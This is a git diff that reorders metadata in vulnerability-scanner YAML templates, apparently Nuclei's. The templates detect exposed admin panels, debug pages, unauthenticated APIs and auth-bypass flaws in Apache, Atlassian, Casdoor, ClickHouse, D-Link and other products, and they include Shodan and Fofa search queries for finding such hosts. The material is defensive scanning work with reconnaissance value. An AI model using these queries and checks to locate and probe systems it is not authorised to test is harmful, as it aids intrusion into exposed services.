index 3d7180231f..fa245955e5 100644
--- a/http/misconfiguration/ampache-update-exposure.yaml
+++ b/http/misconfiguration/ampache-update-exposure.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: low
description: Ampache update page is exposed.
+ classification:
+ cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"Ampache Update"
- product: ampache
vendor: ampache
+ product: ampache
+ shodan-query: http.html:"Ampache Update"
tags: misconfig,ampache,exposure
- classification:
- cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221008c0739e4fd795e10d4e26b6443d2e7aaaca3f7a319581604454da0b81291e1da0220044cbd8795a1b1cae54923ff98d84c81e7d7aceb029169ab143825e7caa870f6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221008c0739e4fd795e10d4e26b6443d2e7aaaca3f7a319581604454da0b81291e1da0220044cbd8795a1b1cae54923ff98d84c81e7d7aceb029169ab143825e7caa870f6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/apache-drill-exposure.yaml b/http/misconfiguration/apache-drill-exposure.yaml
index c6389ee8ac..3c8a7a5870 100644
--- a/http/misconfiguration/apache-drill-exposure.yaml
+++ b/http/misconfiguration/apache-drill-exposure.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: low
description: Apache Drill is exposed.
+ classification:
+ cpe: cpe:2.3:a:apache:drill:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Apache Drill"
- product: drill
vendor: apache
+ product: drill
+ shodan-query: title:"Apache Drill"
tags: misconfig,exposure,apache,drill
- classification:
- cpe: cpe:2.3:a:apache:drill:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022030a4b7d4ffd3e534e720562827eace6ff4cd882b42ea16bfc4f29e2acf204f03022100cc67ba72b9d427ec1d39676424f61bbca5cff7ad1cae2c5e09535a4d04f519d0:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022030a4b7d4ffd3e534e720562827eace6ff4cd882b42ea16bfc4f29e2acf204f03022100cc67ba72b9d427ec1d39676424f61bbca5cff7ad1cae2c5e09535a4d04f519d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/apache-druid-unauth.yaml b/http/misconfiguration/apache-druid-unauth.yaml
index b4574d9942..f7f67c5439 100644
--- a/http/misconfiguration/apache-druid-unauth.yaml
+++ b/http/misconfiguration/apache-druid-unauth.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: low
description: Apache Druid is exposed to external users.
+ classification:
+ cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Apache Druid"
- product: druid
vendor: apache
+ product: druid
+ shodan-query: title:"Apache Druid"
tags: misconfig,druid,unauth,apache
- classification:
- cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022032410ebe88dff06244ecd5348b0e4a3340bcc6cbab1c26d061e3231e039f3e610221009adb943521d59e4485ab6d9a04e2117e3db0c6dae660a5ff0aa31213e9b83d97:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022032410ebe88dff06244ecd5348b0e4a3340bcc6cbab1c26d061e3231e039f3e610221009adb943521d59e4485ab6d9a04e2117e3db0c6dae660a5ff0aa31213e9b83d97:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/apache-impala.yaml b/http/misconfiguration/apache-impala.yaml
index 2d7735ca8f..009c58aadd 100644
--- a/http/misconfiguration/apache-impala.yaml
+++ b/http/misconfiguration/apache-impala.yaml
@@ -7,16 +7,16 @@ info:
description: Apache Impala is exposed.
reference:
- https://www.facebook.com/photo/?fbid=627585602745296&set=pcb.627585619411961
+ classification:
+ cpe: cpe:2.3:a:apache:impala:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:587330928
- product: impala
vendor: apache
+ product: impala
+ shodan-query: http.favicon.hash:587330928
tags: misconfig,apache,impala
- classification:
- cpe: cpe:2.3:a:apache:impala:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502201dc3cd253eed22c678589452bebea6692552bfa91a81c9467c9a5a82f1f8ecdd022100e382474589312820dc0673ff200915a390c42824a0a4ee59a86114f1b7a800b5:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502201dc3cd253eed22c678589452bebea6692552bfa91a81c9467c9a5a82f1f8ecdd022100e382474589312820dc0673ff200915a390c42824a0a4ee59a86114f1b7a800b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/apache-struts-showcase.yaml b/http/misconfiguration/apache-struts-showcase.yaml
index aae3ce1b00..8c9a6c02fb 100644
--- a/http/misconfiguration/apache-struts-showcase.yaml
+++ b/http/misconfiguration/apache-struts-showcase.yaml
@@ -7,16 +7,16 @@ info:
description: Apache Structs ShowCase Application is exposed.
reference:
- https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java
+ classification:
+ cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"Struts2 Showcase"
- product: struts
vendor: apache
+ product: struts
+ shodan-query: title:"Struts2 Showcase"
tags: apache,struts,showcase,misconfig,exposure
- classification:
- cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100bd7f7b423bdd7d05868d8f1d47733eb40b471785b26564871538af7feb86839f022043022c33d92e6e55425a6b5e0066b736116a66816970b6d9c28d4f4731010799:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100bd7f7b423bdd7d05868d8f1d47733eb40b471785b26564871538af7feb86839f022043022c33d92e6e55425a6b5e0066b736116a66816970b6d9c28d4f4731010799:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/apple-cups-exposure.yaml b/http/misconfiguration/apple-cups-exposure.yaml
index fd93a69cb7..37e0c6fede 100644
--- a/http/misconfiguration/apple-cups-exposure.yaml
+++ b/http/misconfiguration/apple-cups-exposure.yaml
@@ -8,16 +8,16 @@ info:
Apple CUPS Sources was exposed.
reference:
- https://github.com/apple/cups
+ classification:
+ cpe: cpe:2.3:a:apple:cups:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Home - CUPS"
- product: cups
vendor: apple
+ product: cups
+ shodan-query: html:"Home - CUPS"
tags: apple,cups,exposure,misconfig
- classification:
- cpe: cpe:2.3:a:apple:cups:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d5acd38c88c7e860f27b1544c681398a343985c6f3c4adaa2d8fad232f5c9591022100e986b0836bdb5e42a5309d66374b8999766ff3ca6f568b2387e933f08ca34f9d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100d5acd38c88c7e860f27b1544c681398a343985c6f3c4adaa2d8fad232f5c9591022100e986b0836bdb5e42a5309d66374b8999766ff3ca6f568b2387e933f08ca34f9d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/atlassian-bamboo-build.yaml b/http/misconfiguration/atlassian-bamboo-build.yaml
index 7719aa3af3..62c4e24a3b 100644
--- a/http/misconfiguration/atlassian-bamboo-build.yaml
+++ b/http/misconfiguration/atlassian-bamboo-build.yaml
@@ -4,16 +4,16 @@ info:
name: Atlassian Bamboo Build Dashboard
author: DhiyaneshDK
severity: unknown
+ classification:
+ cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Build Dashboard - Atlassian Bamboo"
- product: bamboo
vendor: atlassian
+ product: bamboo
+ shodan-query: title:"Build Dashboard - Atlassian Bamboo"
tags: misconfig,atlassian,bamboo
- classification:
- cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502200efd94247b76255574cc32b50365f1821d561bf7b226cc1430091fcf6ba61770022100cbc16a88c5a70b05497ec2551205be3cf455ed23a7cf4d0a083226d1c34e8857:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200efd94247b76255574cc32b50365f1821d561bf7b226cc1430091fcf6ba61770022100cbc16a88c5a70b05497ec2551205be3cf455ed23a7cf4d0a083226d1c34e8857:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/bitbucket-auth-bypass.yaml b/http/misconfiguration/bitbucket-auth-bypass.yaml
index 7da18fa121..6796d60ff3 100644
--- a/http/misconfiguration/bitbucket-auth-bypass.yaml
+++ b/http/misconfiguration/bitbucket-auth-bypass.yaml
@@ -8,17 +8,17 @@ info:
There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
+ classification:
+ cpe: cpe:2.3:a:atlassian:bitbucket_data_center:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: atlassian
+ product: bitbucket_data_center
shodan-query: title:"Log in - Bitbucket"
fofa-query: title="Log in - Bitbucket"
- product: bitbucket_data_center
- vendor: atlassian
tags: misconfig,atlassian,bitbucket,auth-bypass
- classification:
- cpe: cpe:2.3:a:atlassian:bitbucket_data_center:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502201946e48b08668a0597ded653e54bb13c9963cbdb12f6346ec925a3e6e076ed1b022100a2f3c87d0283a2d813f657de5284441fcb2c45757e5892bac85dee2fbec0a7ed:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502201946e48b08668a0597ded653e54bb13c9963cbdb12f6346ec925a3e6e076ed1b022100a2f3c87d0283a2d813f657de5284441fcb2c45757e5892bac85dee2fbec0a7ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/bitbucket-public-repository.yaml b/http/misconfiguration/bitbucket-public-repository.yaml
index 54bcbb1121..5ea0fa39e2 100644
--- a/http/misconfiguration/bitbucket-public-repository.yaml
+++ b/http/misconfiguration/bitbucket-public-repository.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: low
description: Bitbucket Public Repository is exposed.
+ classification:
+ cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.component:"Bitbucket"
- product: bitbucket
vendor: atlassian
+ product: bitbucket
+ shodan-query: http.component:"Bitbucket"
tags: misconfig,bitbucket
- classification:
- cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100ef4ca6052fba249e81286a51927cb5134633b363ceb7519da7c8e92fc43b0b3d02207f22c712d50b529e3c282aa667c4092eaf94c91e94bb26430971d8e18b37a437:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100ef4ca6052fba249e81286a51927cb5134633b363ceb7519da7c8e92fc43b0b3d02207f22c712d50b529e3c282aa667c4092eaf94c91e94bb26430971d8e18b37a437:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/browserless-debugger.yaml b/http/misconfiguration/browserless-debugger.yaml
index f05fe793cc..ef778c61a8 100644
--- a/http/misconfiguration/browserless-debugger.yaml
+++ b/http/misconfiguration/browserless-debugger.yaml
@@ -7,15 +7,15 @@ info:
description: Browserless instance can be used to make web requests. May worth checking /workspace for juicy files.
reference:
- https://docs.browserless.io/docs/docker.html#securing-your-instance
- metadata:
- max-request: 1
- shodan-query: http.title:"browserless debugger"
- product: chrome
- vendor: browserless
- tags: browserless,unauth,debug,misconfig
-
classification:
cpe: cpe:2.3:a:browserless:chrome:*:*:*:*:node.js:*:*:*
+ metadata:
+ max-request: 1
+ vendor: browserless
+ product: chrome
+ shodan-query: http.title:"browserless debugger"
+ tags: browserless,unauth,debug,misconfig
+
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100fbc099737ef182029191e896b9806e610a162693a38bcbf4fabd84a3a064ce64022100cb27dd4e8aa539c21facd415d9a3d360e356988d5e4a4f33d57178e4d1602959:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100fbc099737ef182029191e896b9806e610a162693a38bcbf4fabd84a3a064ce64022100cb27dd4e8aa539c21facd415d9a3d360e356988d5e4a4f33d57178e4d1602959:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/casdoor-users-password.yaml b/http/misconfiguration/casdoor-users-password.yaml
index 53204ae2a5..ac88a37790 100644
--- a/http/misconfiguration/casdoor-users-password.yaml
+++ b/http/misconfiguration/casdoor-users-password.yaml
@@ -8,16 +8,16 @@ info:
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go
+ classification:
+ cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="Casdoor"
- product: casdoor
vendor: casbin
+ product: casdoor
+ fofa-query: title="Casdoor"
tags: casdoor,exposure,misconfig,disclosure
- classification:
- cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022057b135d11bf810e830e05881ffc3254f26c1436f37bcd9d9b4542bcde8755427022010d1ddee07bed42e9d2a7428aaeff2b6a8df455ea5f97e6b267b19cbc8889b20:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022057b135d11bf810e830e05881ffc3254f26c1436f37bcd9d9b4542bcde8755427022010d1ddee07bed42e9d2a7428aaeff2b6a8df455ea5f97e6b267b19cbc8889b20:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/chatgpt-web-unauth.yaml b/http/misconfiguration/chatgpt-web-unauth.yaml
index 2c2e6eb6b5..747387ca3e 100644
--- a/http/misconfiguration/chatgpt-web-unauth.yaml
+++ b/http/misconfiguration/chatgpt-web-unauth.yaml
@@ -5,16 +5,16 @@ info:
author: SleepingBag945
severity: high
description: ChatGPT Web is exposed.
+ classification:
+ cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: app="Chatgpt-web"
- product: chatgpt_web
vendor: chanzhaoyu
+ product: chatgpt_web
+ fofa-query: app="Chatgpt-web"
tags: chatgpt,unauth,misconfig
- classification:
- cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -42,4 +42,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221009335765c3a461281c6686e5525ef4df6ad033b509221998c003f467783efccbe022002fed2ad57b70a38346af4229f8309b5d16a21de09c245e1af3638f9d0086475:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221009335765c3a461281c6686e5525ef4df6ad033b509221998c003f467783efccbe022002fed2ad57b70a38346af4229f8309b5d16a21de09c245e1af3638f9d0086475:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/clickhouse-unauth-api.yaml b/http/misconfiguration/clickhouse-unauth-api.yaml
index d787252526..9e94edf707 100644
--- a/http/misconfiguration/clickhouse-unauth-api.yaml
+++ b/http/misconfiguration/clickhouse-unauth-api.yaml
@@ -8,17 +8,17 @@ info:
reference:
- https://github.com/luck-ying/Library-POC/blob/master/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93%208123%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.py
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.md?plain=1
+ classification:
+ cpe: cpe:2.3:a:clickhouse:clickhouse:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: clickhouse
+ product: clickhouse
shodan-query: "X-ClickHouse-Summary"
fofa-query: "X-ClickHouse-Summary"
- product: clickhouse
- vendor: clickhouse
tags: misconfig,clickhouse,unauth,disclosure
- classification:
- cpe: cpe:2.3:a:clickhouse:clickhouse:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -41,4 +41,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100a0b5c453b540196a3297c18713c3638b6327d815009a24c1b054e31cd98ab0ab02203243446e5cb8801e67889a19c0c6dd4298a25228b1181c835f909574b5096336:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100a0b5c453b540196a3297c18713c3638b6327d815009a24c1b054e31cd98ab0ab02203243446e5cb8801e67889a19c0c6dd4298a25228b1181c835f909574b5096336:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/codeigniter-errorpage.yaml b/http/misconfiguration/codeigniter-errorpage.yaml
index 4694ed2050..61deab0539 100644
--- a/http/misconfiguration/codeigniter-errorpage.yaml
+++ b/http/misconfiguration/codeigniter-errorpage.yaml
@@ -5,17 +5,17 @@ info:
author: j4vaovo
severity: low
description: CodeIgniter error debug are enabled.
+ classification:
+ cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: codeigniter
+ product: codeigniter
shodan-query: title:"Error" html:"CodeIgniter"
fofa-query: title="ErrorException"
- product: codeigniter
- vendor: codeigniter
tags: codeigniter,misconfig,error
- classification:
- cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -42,4 +42,5 @@ http:
- 200
- 500
condition: or
-# digest: 4a0a00473045022100e319bcb75ac516a3b64842cee0c3a3a33f986ea077cfe62f49c0696041a6108202203874da1c083c996fb5fce8ab458fee421bf5b1d2c9dbe7646e06cd167c873c99:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100e319bcb75ac516a3b64842cee0c3a3a33f986ea077cfe62f49c0696041a6108202203874da1c083c996fb5fce8ab458fee421bf5b1d2c9dbe7646e06cd167c873c99:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/codemeter-webadmin.yaml b/http/misconfiguration/codemeter-webadmin.yaml
index ef4a65b9e2..89b632bebc 100644
--- a/http/misconfiguration/codemeter-webadmin.yaml
+++ b/http/misconfiguration/codemeter-webadmin.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: low
description: CodeMeter Webadmin Dashboard is exposed.
+ classification:
+ cpe: cpe:2.3:a:wibu:codemeter:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"CodeMeter"
- product: codemeter
vendor: wibu
+ product: codemeter
+ shodan-query: html:"CodeMeter"
tags: misconfig,exposure,codemeter
- classification:
- cpe: cpe:2.3:a:wibu:codemeter:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220207a4d8416d0eaaaae895ad3ebe6cb609571e0eca805a2752fa911c8b247d3f50220307c9c8a42f0463b53b32bdc4bceb92d7bec6e4285a0e2876d686440fa42009b:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220207a4d8416d0eaaaae895ad3ebe6cb609571e0eca805a2752fa911c8b247d3f50220307c9c8a42f0463b53b32bdc4bceb92d7bec6e4285a0e2876d686440fa42009b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/confluence/confluence-oauth-admin.yaml b/http/misconfiguration/confluence/confluence-oauth-admin.yaml
index 8b922823aa..fbe8e4e358 100644
--- a/http/misconfiguration/confluence/confluence-oauth-admin.yaml
+++ b/http/misconfiguration/confluence/confluence-oauth-admin.yaml
@@ -4,16 +4,16 @@ info:
name: Confluence OAuth Administration Endpoint
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.component:"Atlassian Confluence"
- product: confluence_server
vendor: atlassian
+ product: confluence_server
+ shodan-query: http.component:"Atlassian Confluence"
tags: misconfig,jira,confluence,atlassian
- classification:
- cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,4 @@ http:
status:
- 200
-# digest: 490a0046304402205f5d2f6d95a707362ce5fb3826602901729a8b3859f7d0749aa0492016d3b19e022043b856314d022b592b5ddcbb70711c732af0a74200285cad7bc71ece864493fc:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205f5d2f6d95a707362ce5fb3826602901729a8b3859f7d0749aa0492016d3b19e022043b856314d022b592b5ddcbb70711c732af0a74200285cad7bc71ece864493fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/debug/ampache-debug.yaml b/http/misconfiguration/debug/ampache-debug.yaml
index 3ada6c1880..5ce91a1282 100644
--- a/http/misconfiguration/debug/ampache-debug.yaml
+++ b/http/misconfiguration/debug/ampache-debug.yaml
@@ -4,16 +4,16 @@ info:
name: Ampache Debug Page
author: ritikchaddha
severity: info
+ classification:
+ cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.title:"Ampache -- Debug Page"
- product: ampache
vendor: ampache
+ product: ampache
+ shodan-query: http.title:"Ampache -- Debug Page"
tags: misconfig,ampache,debug
- classification:
- cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
status:
- 200
-# digest: 490a0046304402204fc96c27b19ab1615ece4b327244a62166cee8f2f8aabd0a48dbefab8865984502201572545154f63f6bf6f67cbbdbc65d7a0e7b286b67fdcf4424c5e5c446cb48ff:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402204fc96c27b19ab1615ece4b327244a62166cee8f2f8aabd0a48dbefab8865984502201572545154f63f6bf6f67cbbdbc65d7a0e7b286b67fdcf4424c5e5c446cb48ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/debug/bottle-debug.yaml b/http/misconfiguration/debug/bottle-debug.yaml
index d9d7eec4ba..a7ee7da17d 100644
--- a/http/misconfiguration/debug/bottle-debug.yaml
+++ b/http/misconfiguration/debug/bottle-debug.yaml
@@ -6,16 +6,16 @@ info:
severity: info
reference:
- https://bottlepy.org/docs/dev/tutorial.html#debug-mode
+ classification:
+ cpe: cpe:2.3:a:bottlepy:bottle:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Sorry, the requested URL"
- product: bottle
vendor: bottlepy
+ product: bottle
+ shodan-query: html:"Sorry, the requested URL"
tags: bottle,exposure,debug,misconfig
- classification:
- cpe: cpe:2.3:a:bottlepy:bottle:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
- "'{{BaseURL}}/'"
condition: or
-# digest: 4a0a00473045022012b6c62f22fdb55acfcc6273506038637071f337b450e4cc0f8950870e324624022100f75350502fd6d4b2c633ea8670b249e594b40748f5a1ca5df478d71059a6a64d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022012b6c62f22fdb55acfcc6273506038637071f337b450e4cc0f8950870e324624022100f75350502fd6d4b2c633ea8670b249e594b40748f5a1ca5df478d71059a6a64d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/debug/flask-werkzeug-debug.yaml b/http/misconfiguration/debug/flask-werkzeug-debug.yaml
index b827866657..b3c34526a1 100644
--- a/http/misconfiguration/debug/flask-werkzeug-debug.yaml
+++ b/http/misconfiguration/debug/flask-werkzeug-debug.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: low
description: Flask Werkzeug Debugger is exposed.
+ classification:
+ cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Werkzeug powered traceback interpreter"
- product: werkzeug
vendor: palletsprojects
+ product: werkzeug
+ shodan-query: html:"Werkzeug powered traceback interpreter"
tags: werkzeug,exposure,debug,misconfig
- classification:
- cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 500
-# digest: 4b0a00483046022100c518e1fe0851c09171f99cd760d1a3d502d865e36aa5cc054e0d7d5a0ee24e860221008894b61367eee9ece8b8e3823f65efa8e47d1d41323d0acaa7c397ce45632a54:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c518e1fe0851c09171f99cd760d1a3d502d865e36aa5cc054e0d7d5a0ee24e860221008894b61367eee9ece8b8e3823f65efa8e47d1d41323d0acaa7c397ce45632a54:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/debug/github-debug.yaml b/http/misconfiguration/debug/github-debug.yaml
index 796ff1caeb..70578365fd 100644
--- a/http/misconfiguration/debug/github-debug.yaml
+++ b/http/misconfiguration/debug/github-debug.yaml
@@ -4,16 +4,16 @@ info:
name: GitHub Debug Page
author: ritikchaddha
severity: info
+ classification:
+ cpe: cpe:2.3:a:github:github:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"GitHub Debug"
- product: github
vendor: github
+ product: github
+ shodan-query: http.title:"GitHub Debug"
tags: misconfig,github,debug
- classification:
- cpe: cpe:2.3:a:github:github:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,4 @@ http:
status:
- 200
-# digest: 4a0a004730450220368f65ddbf626763d8326cc25f3668115141d7fd2180672ca147a14dec0236e502210080a54b7634fad72382160016ff20b85118873418acca127af37dd58707234329:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220368f65ddbf626763d8326cc25f3668115141d7fd2180672ca147a14dec0236e502210080a54b7634fad72382160016ff20b85118873418acca127af37dd58707234329:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/dlink-unauth-cgi-script.yaml b/http/misconfiguration/dlink-unauth-cgi-script.yaml
index 69e4249ed9..9c11e144ed 100644
--- a/http/misconfiguration/dlink-unauth-cgi-script.yaml
+++ b/http/misconfiguration/dlink-unauth-cgi-script.yaml
@@ -8,16 +8,16 @@ info:
A vulnerability has been identified in the D-Link DNS series network storage devices, allowing for the exposure of sensitive device information to unauthorized actors. This vulnerability is due to an unauthenticated access flaw in the info.cgi script, which can be exploited via a simple HTTP GET request, affecting over 920,000 devices on the Internet.
reference:
- https://github.com/netsecfish/info_cgi
+ classification:
+ cpe: cpe:2.3:h:dlink:dns-345:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: "app=\"D_Link-DNS\""
- product: dns-345
vendor: dlink
+ product: dns-345
+ fofa-query: "app=\"D_Link-DNS\""
tags: unauth,dlink,misconfig
- classification:
- cpe: cpe:2.3:h:dlink:dns-345:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100faef3e2642d3cd1b6e8e24c56eb728238309501a9db8898c308041635af4bbb6022100ed2440b3bd0c13869879595085a08be11ff936d4e974efba5ccd878ed7bf8de8:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100faef3e2642d3cd1b6e8e24c56eb728238309501a9db8898c308041635af4bbb6022100ed2440b3bd0c13869879595085a08be11ff936d4e974efba5ccd878ed7bf8de8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/docmosis-tornado-server.yaml b/http/misconfiguration/docmosis-tornado-server.yaml
index 780249dc4a..897c67d518 100644
--- a/http/misconfiguration/docmosis-tornado-server.yaml
+++ b/http/misconfiguration/docmosis-tornado-server.yaml
@@ -5,16 +5,16 @@ info:
author: tess
severity: low
description: Docmosis Tornado Server is exposed.
+ classification:
+ cpe: cpe:2.3:a:docmosis:tornado:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
